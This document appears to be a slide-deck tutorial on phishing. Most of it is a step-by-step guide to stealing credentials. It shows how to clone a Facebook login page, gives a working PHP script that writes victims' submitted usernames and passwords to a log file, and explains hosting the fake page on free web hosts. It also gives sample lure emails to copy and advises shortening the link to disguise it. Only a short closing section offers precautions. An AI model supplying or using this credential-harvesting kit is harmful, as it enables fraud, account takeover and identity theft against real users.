Phishing

(A Social Engineering Technique)

 Session Flow

History of Phishing
What is Phishing?
Types of Phishing
Why it is called as a Social Engineering Technique?
Steps to perform Phishing
Tricks to perform Phishing
Precautions against Phishing Attempts
 History of Phishing

Similar to fishing in a lake or river, phishing is computer lingo for fishing

over the Internet for personal information.
The term was first used in 1996, when the first phishing act was recorded.
Phishing uses link manipulation, image filter evasion and website forgery
to fool Web users into thinking that a spoofed website is genuine and
legitimate.
Once the user enters vital information, he immediately becomes a
phishing victim.
 What is Phishing?

Phishing is the fraudulent act of acquiring private and sensitive

information, such as credit card numbers, personal identification and
account usernames and passwords.

Using a complex set of social engineering techniques and computer

programming expertise, phishing websites lure email recipients and Web
users into believing that a spoofed website is legitimate and genuine.

In actuality, the phishing victim later discovers his personal identity and
other vital information have been stolen and exposed.
 Types of Phishing

Web Based Phishing

Desktop Phishing

Spear Phishing

SMS Phishing

Voice Phishing(a.k.a. Vishing)

 Types of Phishing
Web Based Phishing : Web based phishing is a way of attempting to
acquire information such as usernames, passwords, and credit card details
by masquerading as a trustworthy entity in an electronic communication
via emails and social networking sites.

Desktop Phishing : Desktop phishing is a kind of phishing where you have

to just replace some text in the hosts file located in Windows directory in
the victim machine and whenever he goes to the real website like
yahoo.com then real website won’t open instead of it the phishing page
will open which will be hosted in your computer.

Spear Phishing : Phishing attempts directed at specific individuals or

companies have been termed spear phishing. Attackers may gather
personal information about their target to increase their probability of
success. This technique is, by far, the most successful on the internet
today, accounting for 91% of attacks.
 Types of Phishing
SMS Phishing : SMS phishing attempts occur when cell phone user is the
recipient of a message acknowledging receipt of an unknown purchase. To
terminate bogus purchases and avoid monthly or daily charges, consumers
are directed to phishing websites. Unknowingly, customers go directly to
the website, allowing hackers to access personal cell phone information.
SMS phishing has become increasingly prevalent on social website
networks, such as Facebook.

Voice Phishing : Voice phishing is currently the latest type of phishing. Not
all phishing attacks require a fake website. Messages that claimed to be
from a bank told users to dial a phone number regarding problems with
their bank accounts. Once the phone number (owned by the phisher, and
provided by a Voice over IP service) was dialled, prompts told users to
enter their account numbers and PIN. Vishing (voice phishing) sometimes
uses fake caller-ID data to give the appearance that calls come from a
trusted organization.
 Phishing – A Social Engineering Technique

Why Phishing is also termed as Social Engineering Technique?

These days due to enhanced security in major social

networking sites and banking sites, no such method is
available to steal username ,password, credit card details etc.
directly.
Thus an indirect way called Phishing is used to steal username,
passwords, credit card details and many confidential
information.
Every indirect way to perform hacking is called Social
Engineering Technique out of which, one is Phishing.
 Steps to perform Phishing

Step 1 : Create a fake page of target web page i.e. gmail,

ymail, facebook etc. login page that you want to phish.

 How to create a fake page?

 In order to create a fake page, you need to go to target web page, for
example you want to phish someone’s facebook account username and
password, you need to go to https://www.facebook.com and have to save
the web page by either pressing Ctrl + S or by right clicking on screen and
choose Save Page as option.

 Now you need to open it in any text editor like Notepad, Notepad++ etc.
 Steps to perform Phishing

 After opening it in a notepad, press Ctrl + F to find action keyword which is

inside the HTML Form.
 Change the value of action to login.php.
 Check for other actions if any used inside other forms.
 Save it and give any appropriate name with .html extension.
 That’s it, you have successfully created a fake page a.k.a. phishing page.
 Steps to perform Phishing
Step 2 : Create a Phishing Script.

 How to create a Phishing Script?

 Copy the below given PHP code in notepad and save it as login.php
<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 Steps to perform Phishing

Step 3 : Upload these 2 files i.e. fake page and phishing script
on some server.

Hackers mostly use free web hosting services like 000webhost.com,

byethost.com and many such other sites.

In this tutorial, we will use 000webhost.com to upload our files.

Follow the below simple steps to upload your files.

1. Signup in 000webhost.com.
2. Login to 000webhost.com.
3. Go to CPanel.
4. Open FTP Details.
 Steps to perform Phishing

5. Change the default password.

6. Go back and Open File Manager.
7. Go to public_html folder and upload your files there using upload
functionality given on website.
Note: You have to strictly upload your files in public_html folder.
8. Open your fake page link now. You’ll see an identical page to facebook
which is not a real one but your phishing page.
 Steps to perform Phishing

Step 4 : Send a fake page link to VICTIM via en email or any other media.
Step 5 : As soon as VICTIM will open your page and enter the credentials,
his credentials would be logged on your server and a new file named as
log.txt would get generated at following location.
File Manager  public_html  log.txt
Step 6 : Open log.txt to see VICTIM’s username and password.
That’s it, you have phished a VICTIM successfully.
 Tricks to perform Phishing

Below are some real time emails that are recorded as a phishing attempt
on some popular sites.
You can also do it in a same way.

Example 1 : Password Expiration

Subject: Your password will expire soon

Date: September 19, 2014
<BAD LINK: Click here to proceed with your Email update>
 Tricks to perform Phishing

Example 2 : System Maintenance

Subject: System Maintenance!: Verify Your Email Address
Date: September 13, 2014
From: IT Service Desk <rodemaker3@tritons.iowacentral.edu>
Sent: Saturday, September 13, 2014 5:04 PM
To:
Subject: System Maintenance!: Verify Your Email Address

IT Cornell Service System Maintenance!

Our systems have detected an unusual high volume email traffic from this email address with the
data listed below:

Email sent from:

--------------------------------
Total Email sent in 24hrs: 21,639
--------------------------------
Time: 2014-09-12 T 07:09:26Z
--------------------------------
IP address: 207.43.188.4
 Tricks to perform Phishing

You can also shorten your fake page link or say phishing link
by using some URL Shortening services.
Below are some good URL Shorteners.

1. http://goo.gl  Google’s URL Shortening Service.

2. http://bit.ly  Bitly URL Shortnening Service.
3. http://tinyurl.com  TinyURL Shortnening Service.
 Precaution against Phishing Attempts

There is no prevention against phishing attacks but one can

always take some precautions while surfing onto Internet and
using their accounts.
Following are the precautionary measures that one needs to
take to stay away from getting phished.

1. Never open your account from any untrusted(3rd Party) link.

2. In case of doubt, always check the value of action attribute
by either pressing Ctrl + U or else by right clicking on screen
and selecting View Page Source.
Thank You !!